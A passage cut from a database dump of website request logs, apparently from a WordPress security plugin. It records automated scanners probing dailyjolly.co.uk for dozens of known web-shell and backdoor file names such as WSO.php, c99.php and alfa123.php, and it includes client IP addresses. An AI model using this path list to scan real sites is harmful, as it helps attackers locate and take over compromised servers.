iuLcYn1mChRxW4','','19|0|0|0|dailyjolly.co.uk/V3.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440287.1871,55,'f8M17ZFOhRdl2QNpWe5B9cyk','','19|0|0|0|dailyjolly.co.uk/V5.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440287.7411,55,'hQqp7bFXTucSdMoYRwvBLaNE','','19|0|0|0|dailyjolly.co.uk/www.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440288.2239,55,'6x48ejhC23LqlHzOGTfB9pu0','','19|0|0|0|dailyjolly.co.uk/100.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440289.0464,55,'Zl0qs1VMuSdJYBeK6xPXUnLO','','19|0|0|0|dailyjolly.co.uk/777.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440289.5244,55,'2DcImHpxVB5aAZNwle7LTJWC','','19|0|0|0|dailyjolly.co.uk/defau1t.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440290.1817,55,'6IMEhusaQB5OXDnjwgSZGotp','','19|0|0|0|dailyjolly.co.uk/xox.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440290.8601,55,'t0zRBncW52DjMGUXaoEkPei1','','19|0|0|0|dailyjolly.co.uk/wi.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440291.2953,55,'z8FNbsIrKCZxXdBuYvV2hl7q','','19|0|0|0|dailyjolly.co.uk/mar.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440291.8412,55,'wUXrNTeKAHdIB492qZgfzi0L','','19|0|0|0|dailyjolly.co.uk/root.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440292.2572,55,'I38CvHMmWLZfyGkTVsSERD9d','','19|0|0|0|dailyjolly.co.uk/nee.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440292.9319,55,'tkSxN3usRgYFiPADO6XBKL49','','19|0|0|0|dailyjolly.co.uk/ws.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440293.3938,55,'45TyWedSZvFR7JPu8AEHtBQi','','19|0|0|0|dailyjolly.co.uk/lol.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440293.7172,55,'gcELQAMu9tVyOhwe4D2r0ozX','','19|0|0|0|dailyjolly.co.uk/87.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440294.3790,55,'67bJUNywm9WFktYMKfvOLPnD','','19|0|0|0|dailyjolly.co.uk/7yn.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440294.8927,55,'owGXuNzKlUiIxCMtSOAJpVd8','','19|0|0|0|dailyjolly.co.uk/13.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440295.4482,55,'9tuKaAqbR4wQBrDc3MZT1mfN','','19|0|0|0|dailyjolly.co.uk/FoxWSOv1.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440295.9639,55,'mbk8YeQKADs3oZ5zIL61fJVg','','19|0|0|0|dailyjolly.co.uk/alf.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440296.6194,55,'ngrUDvekwFZiQqR3OXm5P9hy','','19|0|0|0|dailyjolly.co.uk/WSO.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440296.9705,55,'yecUPKYIZFnzCg92SXRVoGrb','','19|0|0|0|dailyjolly.co.uk/hello.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440297.3129,55,'a2JkiDwd1V4YtEjcOeQPSLZ5','','19|0|0|0|dailyjolly.co.uk/if.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440297.8526,55,'jhEqvIxriCOnYoXgcMAfabV5','','19|0|0|0|dailyjolly.co.uk/kk.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440298.3538,55,'QueAoPhwzJMF9fkrSYC4sEga','','19|0|0|0|dailyjolly.co.uk/mrjn.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440298.7640,55,'MYZgSb1EyjwtBAp8FNQqJIXz','','19|0|0|0|dailyjolly.co.uk/kn.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440299.1870,55,'4YiXR2Kez7QjCFPx0M5u86oD','','19|0|0|0|dailyjolly.co.uk/3301.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440299.6442,55,'Hu2QRGlWrwkKPUijanFc5NV7','','19|0|0|0|dailyjolly.co.uk/anone.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440300.1054,55,'wYR4kZiqc1A2vV5h6W9FGUNO','','19|0|0|0|dailyjolly.co.uk/wp-configer.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440300.8421,55,'3O1ASnx4gWRcM7TbLzyQB0rh','','19|0|0|0|dailyjolly.co.uk/wp-ad.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440301.3168,55,'r4m6vMFbCHjDafSzihtEULJd','','19|0|0|0|dailyjolly.co.uk/.wp-cache.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440301.8497,55,'yk6LwZYBKVqD20jpAFMmNlnt','','19|0|0|0|dailyjolly.co.uk/sendmail.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440302.9553,55,'gQsKxVXRuWB1iA8tDIzoLaYT','','19|0|0|0|dailyjolly.co.uk/rahma.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440303.8002,55,'VdxHOGfiluecaMvI60ZNb2t3','','19|0|0|0|dailyjolly.co.uk/nasgor.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440304.4703,55,'wzOIrCbMVlESxtTDZoYfv4q6','','19|0|0|0|dailyjolly.co.uk/wp-confirm.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440304.9776,55,'4bs9lMohXdj3Gyv8iftKARcT','','19|0|0|0|dailyjolly.co.uk/alfa123.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440305.5329,55,'SHrzUbPA8kRQv1Lol7FhJZKT','','19|0|0|0|dailyjolly.co.uk/upload.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440305.9781,55,'MfKucI58C1NEG6kOJ3Up9Q04','','19|0|0|0|dailyjolly.co.uk/bypass.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440306.5389,55,'vaCymsrNAdMWqPOXIkDHRliE','','19|0|0|0|dailyjolly.co.uk/wp-one.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440307.1479,55,'NMuOYnyCfqR6Bt5rmeJTLkSA','','19|0|0|0|dailyjolly.co.uk/alexus.php',0,19,0),('160.176.20.205',2695894221,'',0,1674440307.6177,55,'jdYgxlM1LrBXIFeU0AO9iySN','','19|0|0|0|dailyjolly.co.uk/wso1337.php',0,19,0),('95.191.46.92',1606364764,'',0,1674455270.3203,55,'IjgFQOB0vcXpdynlJWKD3qs5','','19|0|0|0|dailyjolly.co.uk/adminer.php',0,19,0),('20.244.36.78',351544398,'',0,1674458739.0428,55,'BGW4iOzFYTRvosNyZS6DlX5x','','19|0|0|0|www.dailyjolly.co.uk/xleet.php',0,19,0),('20.244.36.78',351544398,'',0,1674458739.9313,55,'0pvEWdCBtmV4AoKbU7rZj5wk','','19|0|0|0|www.dailyjolly.co.uk/0byte.php',0,19,0),('20.244.36.78',351544398,'',0,1674458740.9432,55,'tRhHWSM4iJlbsUew9FY0Df2A','','19|0|0|0|www.dailyjolly.co.uk/wp-content/fw.php',0,19,0),('20.244.36.78',351544398,'',0,1674458741.8528,55,'QHsXScBLO8wdJxjnMZgGEtmA','','19|0|0|0|www.dailyjolly.co.uk/sym.php',0,19,0),('20.244.36.78',351544398,'',0,1674458742.7302,55,'nZukzqTy87t9vFVUcAo2PHOw','','19|0|0|0|www.dailyjolly.co.uk/sym403.php',0,19,0),('20.244.36.78',351544398,'',0,1674458742.7686,10,'nZukzqTy87t9vFVUcAo2PHOw','','707|0|0|0|www.dailyjolly.co.uk/sym403.php',0,707,0),('20.244.36.78',351544398,'',0,1674458743.6644,55,'znkdYChScifpqZmaQrWRVNt7','','19|0|0|0|www.dailyjolly.co.uk/xl.php',0,19,0),('20.244.36.78',351544398,'',0,1674458744.5339,55,'VhevgXUEw1aZD0sudRJ5i6MY','','19|0|0|0|www.dailyjolly.co.uk/symlink.php',0,19,0),('20.244.36.78',351544398,'',0,1674458745.4171,55,'grpwnisvFxf5UWaJ4NhLDTAK','','19|0|0|0|www.dailyjolly.co.uk/wp.php',0,19,0),('20.244.36.78',351544398,'',0,1674458746.2864,55,'tNL0B4eZ3IvbqusEG92Sx75K','','19|0|0|0|www.dailyjolly.co.uk/404.php',0,19,0),('20.244.36.78',351544398,'',0,1674458747.2319,55,'msxUdYcXJDCVnzW8yIAuShoB','','19|0|0|0|www.dailyjolly.co.uk/403.php',0,19,0),('20.244.36.78',351544398,'',0,1674458748.0984,55,'n3ZNU016VtIW8b4AmBd7f9qe','','19|0|0|0|www.dailyjolly.co.uk/up.php',0,19,0),('20.244.36.78',351544398,'',0,1674458749.0124,55,'nePBWIoL17aMOq4pdHYSuEC2','','19|0|0|0|www.dailyjolly.co.uk/c99.php',0,19,0),('20.244.36.78',351544398,'',0,1674458749.8941,55,'LRaxO6jVUmTN8q1tPI5fX40Z','','19|0|0|0|www.dailyjolly.co.uk/xxx.php',0,19,0),('20.244.36.78',351544398,'',0,1674458750.7966,55,'naIKDHJbqpBUxP54A27LrQcw','','19|0|0|0|www.dailyjolly.co.uk/ok.php',0,19,0),('20.244.36.78',351544398,'',0,1674458751.6844,55,'QRv8CjNkVHEWaTqz9yLm27FG','','19|0|0|0|www.dailyjolly.co.uk/0.php',0,19,0),('20.244.36.78',351544398,'',0,1674458752.5748,55,'1TAv3Qehpg5RED9ClxtLZbod','','19|0|0|0|www.dailyjolly.co.uk/x.php',0,19,0),('20.244.36.78',351544398,'',0,1674458753.4804,55,'4d7fE9wN6il13U0RhMrCyQvu','','19|0|0|0|www.dailyjolly.co.uk/xx.php',0,19,0),('20.244.36.78',351544398,'',0,1674458754.3607,55,'RK7vs1AMiDXGc0ZQf46oPrqE','','19|0|0|0|www.dailyjolly.co.uk/1.php',0,19,0),('20.244.36.78',351544398,'',0,1674458755.2366,55,'qyS79P0m2lDCMYb1BnFgZrvt','','19|0|0|0|www.dailyjolly.co.uk/2.php',0,19,0),('20.244.36.78',351544398,'',0,1674458756.0962,55,'evrOMgLQZwqBfNpH6VTn715W','','19|0|0|0|www.dailyjolly.co.uk/3.php',0,19,0),('20.244.36.78',351544398,'',0,1674458756.9727,55,'r0ZTlOaKbNk2sIYLEhF319nV','','19|0|0|0|www.dailyjolly.co.uk/4.php',0,19,0),('20.244.36.78',351544398,'',0,1674458757.8969,55,'ZbuEmawWTxqkScnev3RPs6JK','','19|0|0|0|www.dailyjolly.co.uk/5.php',0,19,0),('20.244.36.78',351544398,'',0,1674458759.0161,55,'fuxHcPjZgeh5zXyr9toBA0Y2','','19|0|0|0|www.dailyjolly.co.uk/6.php',0,19,0),('20.244.36.78',351544398,'',0,1674458760.0970,55,'3oZR0zKwYqd6CLDErun8cjMe','','19|0|0|0|www.dailyjolly.co.uk/7.php',0,19,0),('20.244.36.78',351544398,'',0,1674458760.9824,55,'NXvPak3Qif4UTLleznExSrRK','','19|0|0|0|www.dailyjolly.co.uk/8.php',0,19,0),('20.244.36.78',351544398,'',0,1674458761.8715,55,'AjlGMIK3zceOdy50kw14htTX','','19|0|0|0|www.dailyjolly.co.uk/9.php',0,19,0),('20.244.36.78',351544398,'',0,1674458762.7176,55,'8iByUKcf3eXVdsMF9SxrOnEz','','19|0|0|0|www.dailyjolly.co.uk/10.php',0,19,0),('20.244.36.78',351544398,'',0,1674458763.5784,55,'1xVNvw34Km9nkSLWeaGDpTQl','','19|0|0|0|www.dailyjolly.co.uk/a.php',0,19,0),('20.244.36.78',351544398,'',0,1674458764.4543,55,'HjkRTtLZ5gVwcxdn3pCzrMam','','19|0|0|0|www.dailyjolly.co.uk/z.php',0,19,0),('20.244.36.78',351544398,'',0,1674458765.3831,55,'FqdA95Wts3gIMumweDRXlj8L','','19|0|0|0|www.dailyjolly.co.uk/e.php',0,19,0),('20.244.36.78',351544398,'',0,1674458766.3291,55,'7S2lZyVnEcqk40Csu8YDpBOb','','19|0|0|0|www.dailyjolly.co.uk/r.php',0,19,0),('20.244.36.78',351544398,'',0,1674458767.1967,55,'xIzSqlXDRhAoB10nrM7jCfkt','','19|0|0|0|www.dailyjolly.co.uk/t.php',0,19,0),('20.244.36.78',351544398,'',0,1674458768.0712,55,'o2qKpyj4MNI3rxtHCZv7F9S8','','19|0|0|0|www.dailyjolly.co.uk/y.php',0,19,0),('20.244.36.78',351544398,'',0,1674458768.9373,55,'d78XOxk0GhZoTYlMwuIA1Hzt','','19|0|0|0|www.dailyjolly.co.uk/u.php',0,19,0),('20.244.36.78',351544398,'',0,1674458769.8397,55,'Bj4Itko5dnFVg8OmhlDQUEvK','','19|0|0|0|www.dailyjolly.co.uk/i.php',0,19,0),('20.244.36.78',351544398,'',0,1674458770.7150,55,'YXc04RqFJHv5wxEUQ2np8eL3','','19|0|0|0|www.dailyjolly.co.uk/o.php',0,19,0),('20.244.36.78',351544398,'',0,1674458771.6095,55,'keiTLJNH57lImRUvjbPz6BVp','','19|0|0|0|www.dailyjolly.co.uk/p.php',0,19,0),('20.244.36.78',351544398,'',0,1674458772.4865,55,'UamuzpN27IyePWGOEF8Xk36s','','19|0|0|0|www.dailyjolly.co.uk/q.php',0,19,0),('20.244.36.78',351544398,'',0,1674458773.3968,55,'ZNMUKdBLoXhY2FJl0rtaQipu','','19|0|0|0|www.dailyjolly.co.uk/s.php',0,19,0),('20.244.36.78',351544398,'',0,1674458774.2818,55,'yjRCShsgeVrMm7lfwpb6LIKt','','19|0|0|0|www.dailyjolly.co.uk/d.php',0,19,0),('20.244.36.78',351544398,'',0,1674458775.1727,55,'FRwrt0PzCZaLED2uGsgiyj3U','','19|0|0|0|www.dailyjolly.co.uk/f.php',0,19,0),('20.244.36.78',351544398,'',0,1674458776.1052,55,'iIXyQsD8rV6GzNBPMFJYSTah','','19|0|0|0|www.dailyjolly.co.uk/g.php',0,19,0),('20.244.36.78',351544398,'',0,1674458776.9926,55,'LFl3Ew8S6ou0jrVt19YUBnMf','','19|0|0|0|www.dailyjolly.co.uk/h.php',0,19,0),('20.244.36.78',351544398,'',0,1674458777.8717,55,'TOoCm6MtVShup9Nzxd7gUB8s','','19|0|0|0|www.dailyjolly.co.uk/j.php',0,19,0),('20.244.36.78',351544398,'',0,1674458778.7496,55,'CXkaqAT3E0b965FJoS1iBNhd','','19|0|0|0|www.dailyjolly.co.uk/k.php',0,19,0),('20.244.36.78',351544398,'',0,1674458779.6750,55,'pGNrfMChyt0DUXlvZoA16dWJ','','19|0|0|0|www.dailyjolly.co.uk/l.php',0,19,0),('20.244.36.78',351544398,'',0,1674458780.5780,55,'uGSnxzaYDi0v9FEPsQyAwBOI','','19|0|0|0|www.dailyjolly.co.uk/m.php',0,19,0),('20.244.36.78',351544398,'',0,1674458781.4682,55,'cwrbXfEZ9oPiTp6Jj83aHth0','','19|0|0|0|www.dailyjolly.co.uk/w.php',0,19,0),('20.244.36.78',351544398,'',0,1674458782.3641,55,'v6tyKfjo7E3TO0xNpDqCRukb','','19|0|0|0|www.dailyjolly.co.uk/v.php',0,19,0),('20.244.36.78',351544398,'',0,1674458783.2654,55,'hNbcKGEpJIoRDtygMCzPY2Ui','','19|0|0|0|www.dailyjolly.co.uk/n.php',0,19,0),('20.244.36.78',351544398,'',0,1674458784.1735,55,'RWYCeAHVNw3sk0TyB71KqnX8','','19|0|0|0|www.dailyjolly.co.uk/b.php',0,19,0),('20.244.36.78',351544398,'',0,1674458785.0520,55,'ibKdW8tj9ETUZ705XnrFv1BL','','19|0|0|0|www.dailyjolly.co.uk/c.php',0,19,0),('20.244.36.78',351544398,'',0,1674458785.9168,55,'3AgZMB9C5xItmNVKkR6D0ud8','','19|0|0|0|www.dailyjolly.co.uk/wp-wso.php',0,19,0),('20.244.36.78',351544398,'',0,1674458786.7961,55,'xUd2QKFmP8vR7Xc49twMhyuf','','19|0|0|0|www.dailyjolly.co.uk/priv8.php',0,19,0),('20.244.36.78',351544398,'',0,1674458787.6725,55,'ReF4UpoSvCQz2H1JKPmayZc0','','19|0|0|0|www.dailyjolly.co.uk/minimo.php',0,19,0),('20.244.36.78',351544398,'',0,1674458788.5342,55,'HacisKOwkBFt4dxqYL97D1le','','19|0|0|0|www.dailyjolly.co.uk/V3.php',0,19,0),('20.244.36.78',351544398,'',0,1674458789.4812,55,'EkXHCR3l9pZQtLusn0ge1WwO','','19|0|0|0|www.dailyjolly.co.uk/V5.php',0,19,0),('20.244.36.78',351544398,'',0,1674458790.3619,55,'UD4wjSBtTFVKAoInymiHaXMx','','19|0|0|0|www.dailyjolly.co.uk/www.php',0,19,0),('20.244.36.78',351544398,'',0,1674458791.2322,55,'vTuhM10Gre37aoyDZkmg2jbn','','19|0|0|0|www.dailyjolly.co.uk/100.php',0,19,0),('20.244.36.78',351544398,'',0,1674458792.1157,55,'zNbG0WdD4hVonlkCf9Mm5Sep','','19|0|0|0|www.dailyjolly.co.uk/777.php',0,19,0),('20.244.36.78',351544398,'',0,1674458793.0044,55,'bWlxAFTN6BMy3GgIsDOeikp4','','19|0|0|0|www.dailyjolly.co.uk/defau1t.php',0,19,0),('20.244.36.78',351544398,'',0,1674458793.9351,55,'Zp0K8z4Ch6dnxRuBMEA9mvqb','','19|0|0|0|www.dailyjolly.co.uk/xox.php',0,19,0),('20.244.36.78',351544398,'',0,1674458794.8630,55,'E2Fc7bqBIg91Altn0vuHMRzS','','19|0|0|0|www.dailyjolly.co.uk/new.php',0,19,0),('20.244.36.78',351544398,'',0,1674458795.8412,55,'BAMLc72wGbQxRTIZ3mlsUyXv','','19|0|0|0|www.dailyjolly.co.uk/wi.php',0,19,0),('20.244.36.78',351544398,'',0,1674458796.7286,55,'VUTBtxSAJ0jfi8uLbp6yYHDW','','19|0|0|0|www.dailyjolly.co.uk/mar.php',0,19,0),('20.244.36.78',351544398,'',0,1674458797.6257,55,'SGEPQT7bK0gpZfo1Ia3ckOi5','','19|0|0|0|www.dailyjolly.co.uk/root.php',0,19,0),('20.244.36.78',351544398,'',0,1674458798.4911,55,'VGIFi1ME6q2gZkUd408pu5On','','19|0|0|0|www.dailyjolly.co.uk/nee.php',0,19,0),('20.244.36.78',351544398,'',0,1674458799.3680,55,'9RgshWq0yK7XPULYQG2Verpo','','19|0|0|0|www.dailyjolly.co.uk/ws.php',0,19,0),('20.244.36.78',351544398,'',0,1674458800.2552,55,'Vr3K9mHUQylj86AMvLwEu5Gf','','19|0|0|0|www.dailyjolly.co.uk/lol.php',0,19,0),('20.244.36.78',351544398,'',0,1674458801.1311,55,'ZpNbRIC1LVy84Xav6KjwxTmS','','19|0|0|0|www.dailyjolly.co.uk/87.php',0,19,0),('20.244.36.78',351544398,'',0,1674458802.0447,55,'nUGMaTs45BIcP9LefXJQilvy','','19|0|0|0|www.dailyjolly.co.uk/7yn.php',0,19,0),('20.244.36.78',351544398,'',0,1674458802.9201,55,'z0CZ6P48JpohgTEeWRsNaYVH','','19|0|0|0|www.dailyjolly.co.uk/haxor.php',0,19,0),('20.244.36.78',351544398,'',0,1674458803.8182,55,'iVONgtIXjGl1vDbsS9HQdxZk','','19|0|0|0|www.dailyjolly.co.uk/13.php',0,19,0),('20.244.36.78',351544398,'',0,1674458804.7399,55,'vK8lpXPC2ItVsqObxn3SJyAH','','19|0|0|0|www.dailyjolly.co.uk/FoxWSOv1.php',0,19,0),('20.244.36.78',351544398,'',0,1674458805.6035,55,'ImZMFRBYNcsy2WdVH7K0a3Aj','','19|0|0|0|www.dailyjolly.co.uk/alf.php',0,19,0),('20.244.36.78',351544398,'',0,1674458806.4598,55,'b1RqzgHpN2JuI4VstUGwxhOj','','19|0|0|0|www.dailyjolly.co.uk/bb.php',0,19,0),('20.244.36.78',351544398,'',0,1674458807.3349,55,'JTXoLxyimKUswtVOdY2AzFMq','','19|0|0|0|www.dailyjolly.co.uk/lf.php',0,19,0),('20.244.36.78',351544398,'',0,1674458808.3279,55,'1F7PYAZ03TfJzgrUBqiDve2j','','19|0|0|0|www.dailyjolly.co.uk/WSO.php',0,19,0),('20.244.36.78',351544398,'',0,1674458809.1859,55,'916anSUtxLZDR8vj2W5AmI3P','','19|0|0|0|www.dailyjolly.co.uk/hello.php',0,19,0),('20.244.36.78',351544398,'',0,1674458810.0421,55,'1ukUDmMSX52xEZCzyc7BflrJ','','19|0|0|0|www.dailyjolly.co.uk/if.php',0,19,0),('20.244.36.78',351544398,'',0,1674458810.9833,55,'8pJnNiIVh31DQxYK2AGuSdzb','','19|0|0|0|www.dailyjolly.co.uk/kk.php',0,19,0),('20.244.36.78',351544398,'',0,1674458811.8613,55,'HSNYXq3MIZVzgFyj7OGrL2KP','','19|0|0|0|www.dailyjolly.co.uk/mrjn.php',0,19,0),('20.244.36.78',351544398,'',0,1674458812.7554,55,'lENOwBcKdPM29xnZUiXShJH0','','19|0|0|0|www.dailyjolly.co.uk/kn.php',0,19,0),('20.244.36.78',351544398,'',0,1674458813.7176,55,'n7Y6vzUPITNbFpiaDVKjqx15','','19|0|0|0|www.dailyjolly.co.uk/3301.php',0,19,0),('20.244.36.78',351544398,'',0,1674458814.6626,55,'3LMS8WRngF9ybfEqokdO7sYe','','19|0|0|0|www.dailyjolly.co.uk/leaf.php',0,19,0),('20.244.36.78',351544398,'',0,1674458815.5588,55,'1gxbtNTjAsqrOUE6m2kuZGp4','','19|0|0|0|www.dailyjolly.co.uk/alex.php',0,19,0),('20.244.36.78',351544398,'',0,1674458816.4231,55,'iQktwL4O3vcrWyZnXVFaJ6RI','','19|0|0|0|www.dailyjolly.co.uk/mailer.php',0,19,0),('20.244.36.78',351544398,'',0,1674458817.3169,55,'twZx8BsHKNcYlMLWaqi5Og3R','','19|0|0|0|www.dailyjolly.co.uk/anone.php',0,19,0),('20.244.36.78',351544398,'',0,1674458818.1850,55,'A3ShKeqlnJzkdvpQPisbEcrC','','19|0|0|0|www.dailyjolly.co.uk/wp-configer.php',0,19,0),('20.244.36.78',351544398,'',0,1674458819.0801,55,'gzTuaEkdofZjrUDP9mle2cKG','','19|0|0|0|www.dailyjolly.co.uk/wp-ad.php',0,19,0),('20.244.36.78',351544398,'',0,1674458819.9744,55,'3F7HyK6mCENWG2RatMYq5Io1','','19|0|0|0|www.dailyjolly.co.uk/send.php',0,19,0),('20.244.36.78',351544398,'',0,1674458820.8919,55,'M8wTDPEs1Aq372KlJez5oiUa','','19|0|0|0|www.dailyjolly.co.uk/.wp-cache.php',0,19,0),('20.244.36.78',351544398,'',0,1674458821.7692,55,'E7yLDczOH1IR4srwVfGxBkUv','','19|0|0|0|www.dailyjolly.co.uk/sendmail.php',0,19,0),('20.244.36.78',351544398,'',0,1674458822.6491,55,'xsf3b5DGhLdevkBZEMU6YCOw','','19|0|0|0|www.dailyjolly.co.uk/rahma.php',0,19,0),('20.244.36.78',351544398,'',0,1674458823.6101,55,'GS6OHK9MwXpeEiZtbNU15fxT','','19|0|0|0|www.dailyjolly.co.uk/nasgor.php',0,19,0),('20.244.36.78',351544398,'',0,1674458824.5229,55,'uY8yXcIvCSNOgx5loiVhHek2','','19|0|0|0|www.dailyjolly.co.uk/wp-confirm.php',0,19,0),('20.244.36.78',351544398,'',0,1674458825.4356,55,'bA6R5nWevJaHZhQVKg3SfEU0','','19|0|0|0|www.dailyjolly.co.uk/alfa123.php',0,19,0),('20.244.36.78',351544398,'',0,1674458826.3123,55,'QSBX2JxnUKTGC7zVPpH80uaY','','19|0|0|0|www.dailyjolly.co.uk/upload.php',0,19,0),('20.244.36.78',351544398,'',0,1674458827.1919,55,'PUyAB59fsDLQCdKo16Zph7cH','','19|0|0|0|www.dailyjolly.co.uk/bypass.php',0,19,0),('20.244.36.78',351544398,'',0,1674458828.0998,55,'GTPUf4wsvmDMjAh9WrSklNIV','','19|0|0|0|www.dailyjolly.co.uk/wp-one.php',0,19,0),('20.244.36.78',351544398,'',0,1674458828.9977,55,'dxCAv5pSJRIf1YqKOsXLljna','','19|0|0|0|www.dailyjolly.co.uk/alexus.php',0,19,0),('20.244.36.78',351544398,'',0,1674458829.8940,55,'uNy0RtKq2DQAnPX79oLVvwGd','','19|0|0|0|www.dailyjolly.co.uk/wso1337.php',0,19,0),('20.244.36.78',351544398,'',0,1674459248.4699,55,'wjqEDb7Wt5L1HyacBVdo9FUA','','19|0|0|0|www.dailyjolly.co.uk/xleet.php',0,19,0),('20.244.36.78',351544398,'',0,1674459249.3552,55,'wsWINemUACRaf0tSbhxl9ZzL','','19|0|0|0|www.dailyjolly.co.uk/0byte.php',0,19,0),('20.244.36.78',351544398,'',0,1674459250.2233,55,'aBfoIyXZqSFOHxAu2G7icrKT','','19|0|0|0|www.dailyjolly.co.uk/wp-content/fw.php',0,19,0),('20.244.36.78',351544398,'',0,1674459251.1035,55,'oqGTbVlhIwXY83u1K7fHjmvz','','19|0|0|0|www.dailyjolly.co.uk/sym.php',0,19,0),('20.244.36.78',351544398,'',0,1674459251.9855,55,'sag9wt4hFK1r6BAyb3VUOpGY','','19|0|0|0|www.dailyjolly.co.uk/sym403.php',0,19,0),('20.244.36.78',351544398,'',0,1674459252.8821,55,'QwfsAd25RvVt7imY9MroxG0L','','19|0|0|0|www.dailyjolly.co.uk/xl.php',0,19,0),('20.244.36.78',351544398,'',0,1674459253.7603,55,'B7T0Uw4EOsPqy6nlrmJFcig2','','19|0|0|0|www.dailyjolly.co.uk/symlink.php',0,19,0),('20.244.36.78',351544398,'',0,1674459254.6841,55,'kocVrgHF4mN9lAfU30WqwSEh','','19|0|0|0|www.dailyjolly.co.uk/wp.php',0,19,0),('20.244.36.78',351544398,'',0,1674459255.5764,55,'26hbJYDCzLKZp5t80Sl1wk7o','','19|0|0|0|www.dailyjolly.co.uk/404.php',0,19,0),('20.244.36.78',351544398,'',0,1674459256.4605,55,'p7ZdsFQbLzwkWuYqhnDxEjCO','','19|0|0|0|www.dailyjolly.co.uk/403.php',0,19,0),('20.244.36.78',351544398,'',0,1674459257.3319,55,'5Nrh0OiLfKdtksbDjyuxXY9q','','19|0|0|0|www.dailyjolly.co.uk/up.php',0,19,0),('20.244.36.78',351544398,'',0,1674459258.2143,55,'r3Jd8lzY0DoTSQKEOmGZbXq4','','19|0|0|0|www.dailyjolly.co.uk/c99.php',0,19,0),('20.244.36.78',351544398,'',0,1674459259.1278,55,'hklsQ5y1J3I08YwaAEN4LSVt','','19|0|0|0|www.dailyjolly.co.uk/xxx.php',0,19,0),('20.244.36.78',351544398,'',0,1674459260.0449,55,'uTw0mc5lqVZKJLEe6DfhUo18','','19|0|0|0|www.dailyjolly.co.uk/ok.php',0,19,0),('20.244.36.78',351544398,'',0,1674459260.9295,55,'FC8UhXs3agxRbI9Jiy47zokN','','19|0|0|0|www.dailyjolly.co.uk/0.php',0,19,0),('20.244.36.78',351544398,'',0,1674459261.8231,55,'frz8VsKNbheo7MmFnGcjIJCW','','19|0|0|0|www.dailyjolly.co.uk/x.php',0,19,0),('20.244.36.78',351544398,'',0,1674459262.7366,55,'fSgVT58z4UmeiYBRPALKhjqX','','19|0|0|0|www.dailyjolly.co.uk/xx.php',0,19,0),('20.244.36.78',351544398,'',0,1674459263.6353,55,'fdQsqN6RxHOEuTcbmyPeFGXM','','19|0|0|0|www.dailyjolly.co.uk/1.php',0,19,0),('20.244.36.78',351544398,'',0,1674459264.5148,55,'YnSouT1vlxXCibc874OJeyQZ','','19|0|0|0|www.dailyjolly.co.uk/2.php',0,19,0),('20.244.36.78',351544398,'',0,1674459265.3957,55,'g49GSL2PUnedKIAlD03HVjCx','','19|0|0|0|www.dailyjolly.co.uk/3.php',0,19,0),('20.244.36.78',351544398,'',0,1674459266.3121,55,'jTl56SsikUnfu72Wbypvo8Dz','','19|0|0|0|www.dailyjolly.co.uk/4.php',0,19,0),('20.244.36.78',351544398,'',0,1674459267.2433,55,'SXCurps67kVFJYWLENcQKIAH','','19|0|0|0|www.dailyjolly.co.uk/5.php',0,19,0),('20.244.36.78',351544398,'',0,1674459268.1327,55,'APHULZ8FV6yhx59pQT2Cbk3W','','19|0|0|0|www.dailyjolly.co.uk/6.php',0,19,0),('20.244.36.78',351544398,'',0,1674459269.0174,55,'N82HEk5cpT4KaUZflV0tF7Qj','','19|0|0|0|www.dailyjolly.co.uk/7.php',0,19,0),('20.244.36.78',351544398,'',0,1674459269.9001,55,'vK1eXsWSGin6URyrdFOAIH4z','','19|0|0|0|www.dailyjolly.co.uk/8.php',0,19,0),('20.244.36.78',351544398,'',0,1674459270.7785,55,'acdzil9DCpVHNOLq6Ks1ZrW3','','19|0|0|0|www.dailyjolly.co.uk/9.php',0,19,0),('20.244.36.78',351544398,'',0,1674459271.6434,55,'qodZNuPnjb4c73GSwpaEeUzL','','19|0|0|0|www.dailyjolly.co.uk/10.php',0,19,0),('20.244.36.78',351544398,'',0,1674459272.5261,55,'JRTKx9sLmiGelk6SaUWDoz85','','19|0|0|0|www.dailyjolly.co.uk/a.php',0,19,0),('20.244.36.78',351544398,'',0,1674459273.4107,55,'lwPOD6br7VtSyWGQpNZcnexg','','19|0|0|0|www.dailyjolly.co.uk/z.php',0,19,0),('20.244.36.78',351544398,'',0,1674459274.3384,55,'2q0TLWw1J8s9FanPhMVQxKRH','','19|0|0|0|www.dailyjolly.co.uk/e.php',0,19,0),('20.244.36.78',351544398,'',0,1674459275.2057,55,'hjKCSBd97wU1izQZxbENJ8XL','','19|0|0|0|www.dailyjolly.co.uk/r.php',0,19,0),('20.244.36.78',351544398,'',0,1674459276.0742,55,'ceGivz4QbMU6L3f8CYIqpntO','','19|0|0|0|www.dailyjolly.co.uk/t.php',0,19,0),('20.244.36.78',351544398,'',0,1674459276.9560,55,'0oM9guVz5kU